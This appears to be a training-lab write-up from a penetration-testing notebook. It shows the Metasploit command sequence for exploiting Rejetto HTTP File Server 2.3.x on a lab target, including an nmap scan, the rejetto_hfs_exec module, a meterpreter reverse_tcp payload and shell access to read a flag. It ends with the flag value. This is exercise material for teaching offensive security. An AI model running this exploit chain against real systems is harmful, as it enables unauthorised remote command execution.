🔬HFS - MSF Exploit

Lab 1

🔬 Windows: HTTP File Server
Target IP: 10.2.19.226
Exploit the target with the appropriate Metasploit Framework module
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution

service postgresql start && msfconsole -q

db_status
setg RHOSTS 10.2.19.226
setg RHOST 10.2.19.226
workspace -a HFS

Perform an nmap scan directly into MSF

db_nmap -sS -sV -O 10.2.19.226

search type:exploit name:rejetto
use exploit/windows/http/rejetto_hfs_exec
info
# Description:
#   Rejetto HttpFileServer (HFS) is vulnerable to remote command 
#   execution attack due to a poor regex in the file ParserLib.pas. This 
#   module exploits the HFS scripting commands by using '%00' to bypass 
#   the filtering. This module has been tested successfully on HFS 2.3b 
#   over Windows XP SP3, Windows 7 SP1 and Windows 8.
run

# Type of payload can be changed base on the target O.S. architecture
set payload windows/x64/meterpreter/reverse_tcp

# Always check for the LHOST and LPORT values
run

shell
cd /
type flag.txt

Reveal Flag: 🚩

f74c8347798f4082daf4b4570dba094a

PreviousThe Metasploit Framework (MSF)Next🔬Tomcat - MSF Exploit

Last updated 2 years ago

Was this helpful?